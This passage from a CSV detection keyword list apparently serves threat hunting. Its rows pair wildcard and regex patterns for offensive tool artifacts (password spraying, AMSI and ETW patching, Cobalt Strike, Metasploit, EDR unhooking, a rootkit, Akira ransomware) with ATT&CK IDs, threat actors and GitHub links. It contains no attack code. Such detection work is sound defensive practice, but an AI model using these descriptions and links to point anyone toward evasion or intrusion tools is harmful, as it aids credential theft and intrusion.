"*Password-Scripts*",".{0,1000}Password\-Scripts.{0,1000}","offensive_tool_keyword","Password-Scripts","Password Scripts xploitation ","T1210 - T1555 - T1110 - T1554 - T1553","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/laconicwolf/Password-Scripts","1","0","N/A","N/A","N/A","2","108","37","2019-10-08T17:57:49Z","2017-10-20T17:17:23Z","54483" "*PasswordSpray 
*",".{0,1000}PasswordSpray\s.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!","t1110 - T1114 - T1555","TA0006 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","N/A","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","54484" "*passwordspray*--user-as-pass*",".{0,1000}passwordspray.{0,1000}\-\-user\-as\-pass.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","54485" "*passwordspray.go*",".{0,1000}passwordspray\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","54486" "*passwordSprayCmd*",".{0,1000}passwordSprayCmd.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","54487" "*Paste this link - https://akira*",".{0,1000}Paste\sthis\slink\s\-\shttps\:\/\/akira.{0,1000}","offensive_tool_keyword","Akira","Akira ransomware Windows payload","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#content","N/A","10","4","357","52","2025-04-22T10:00:56Z","2021-07-28T21:00:52Z","54488" 
"*pastehakk_generate*",".{0,1000}pastehakk_generate.{0,1000}","offensive_tool_keyword","pastehakk","perform clipboard poisoning or paste jacking attack","T1115","T0001 - T0002 - T0005","N/A","N/A","Phishing","https://github.com/3xploitGuy/pastehakk","1","0","#linux #content","N/A","7","1","56","10","2020-06-22T01:17:53Z","2020-06-17T19:32:24Z","54497" "*patator ftp_login host=* user=FILE0 0=*.txt *",".{0,1000}patator\sftp_login\shost\=.{0,1000}\suser\=FILE0\s0\=.{0,1000}\.txt\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54498" "*patator*",".{0,1000}patator.{0,1000}","offensive_tool_keyword","patator","Patator was written out of frustration from using Hydra. Medusa. Ncrack. Metasploit modules and Nmap NSE scripts for password guessing attacks. I opted for a different approach in order to not create yet another brute-forcing tool and avoid repeating the same shortcomings. Patator is a multi-threaded tool written in Python. 
that strives to be more reliable and flexible than his fellow predecessors.","T1110 - T1111 - T1210 - T1558.004","TA0006 - TA0005","N/A","Dispossessor","Credential Access","https://github.com/lanjelot/patator","1","0","N/A","N/A","10","10","3704","808","2025-02-17T11:00:36Z","2014-08-25T00:56:21Z","54499" "*Patch-AMSI.*",".{0,1000}Patch\-AMSI\..{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","54500" "*patchAmsiOpenSession*",".{0,1000}patchAmsiOpenSession.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - 
RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","N/A","10","10","378","69","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z","54501" "*patch-amsi-x64-powershell.ps1*",".{0,1000}patch\-amsi\-x64\-powershell\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","54502" "*Patch-ETW.*",".{0,1000}Patch\-ETW\..{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","54503" "*Patching NetRipper DLL*",".{0,1000}Patching\sNetRipper\sDLL.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","54504" 
"*Patching-AMSI-AmsiScanBuffer-by-rasta-mouse*",".{0,1000}Patching\-AMSI\-AmsiScanBuffer\-by\-rasta\-mouse.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","N/A","image","5","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","54505" "*PatchingAPI.exe*",".{0,1000}PatchingAPI\.exe.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","54506" "*Pateensy/PaensyLib/*",".{0,1000}Pateensy\/PaensyLib\/.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","54507" "*--path docToDump.xls*",".{0,1000}\-\-path\sdocToDump\.xls.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","54508" "*Path to a DDSpoof config file to load configuration from*",".{0,1000}Path\sto\sa\sDDSpoof\sconfig\sfile\sto\sload\sconfiguration\sfrom.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","54509" "*path_dll_hijack.h*",".{0,1000}path_dll_hijack\.h.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","0","N/A","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","54510" "*PATH_EXECUTION_HIJACK_PROGRAM*",".{0,1000}PATH_EXECUTION_HIJACK_PROGRAM.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","54511" 
"*pathhijack.py*",".{0,1000}pathhijack\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","54512" "*PaulNorman01/Forensia*",".{0,1000}PaulNorman01\/Forensia.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","1","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","54513" "*PaulSec/twittor*",".{0,1000}PaulSec\/twittor.{0,1000}","offensive_tool_keyword","twittor","A fully featured backdoor that 
uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","N/A","10","10","771","217","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z","54514" "*PayGen*python3 generate.py*",".{0,1000}PayGen.{0,1000}python3\sgenerate\.py.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1059.001 - T1209 - T1105 - T1547 - T1027","TA0003 - TA0005 - TA0002 - TA0011","N/A","N/A","Persistence","https://github.com/youhacker55/PayGen","1","0","N/A","N/A","N/A","1","4","0","2023-02-23T00:05:57Z","2021-06-16T20:20:55Z","54515" "*payload start tetanus*",".{0,1000}payload\sstart\stetanus.{0,1000}","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1059 - T1105 - T1219 - T1573 - T1071","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/MythicAgents/tetanus","1","0","N/A","N/A","N/A","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","54516" "*payload.c *",".{0,1000}payload\.c\s.{0,1000}","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tool","https://github.com/Ayrx/CVE-2021-4034","1","0","N/A","N/A","N/A","1","93","14","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z","54517" "*payload.csproj*",".{0,1000}payload\.csproj.{0,1000}","offensive_tool_keyword","scshell","network pentestration test (shell)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","Lateral Movement","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","N/A","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","54518" "*payload.sct *",".{0,1000}payload\.sct\s.{0,1000}","offensive_tool_keyword","scshell","network pentestration test (shell)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - 
TA0007","N/A","N/A","Lateral Movement","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","N/A","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","54519" "*payload/encryptor_remote.py*",".{0,1000}payload\/encryptor_remote\.py.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","N/A","9","2","151","27","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z","54520" "*payload/pezor.py*",".{0,1000}payload\/pezor\.py.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","1","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","54521" "*payload/windows/dllinject/bind_tcp_uuid*",".{0,1000}payload\/windows\/dllinject\/bind_tcp_uuid.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","54522" "*payload_bootstrap_hint*",".{0,1000}payload_bootstrap_hint.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 
- T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54523" "*payload_creator.py*",".{0,1000}payload_creator\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1059 - T1078 - T1105 - T1110 - T1566","TA0002 - TA0008 - TA0009 - TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","N/A","10","52217","5629","2025-03-03T15:17:19Z","2020-04-11T09:21:31Z","54524" "*payload_encryption.py*",".{0,1000}payload_encryption\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","54525" "*payload_inject.rb*",".{0,1000}payload_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54526" "*payload_local*",".{0,1000}payload_local.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 
- T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","54527" "*payload_msf.c*",".{0,1000}payload_msf\.c.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","54528" "*payload_msf.exe*",".{0,1000}payload_msf\.exe.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. 
","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","54529" "*payload_scripts.cna*",".{0,1000}payload_scripts\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","54530" "*payload_scripts/sleepmask*",".{0,1000}payload_scripts\/sleepmask.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","54531" "*payload_section.cpp*",".{0,1000}payload_section\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","N/A","10","","N/A","","","","54532" "*payload_section.hpp*",".{0,1000}payload_section\.hpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard 
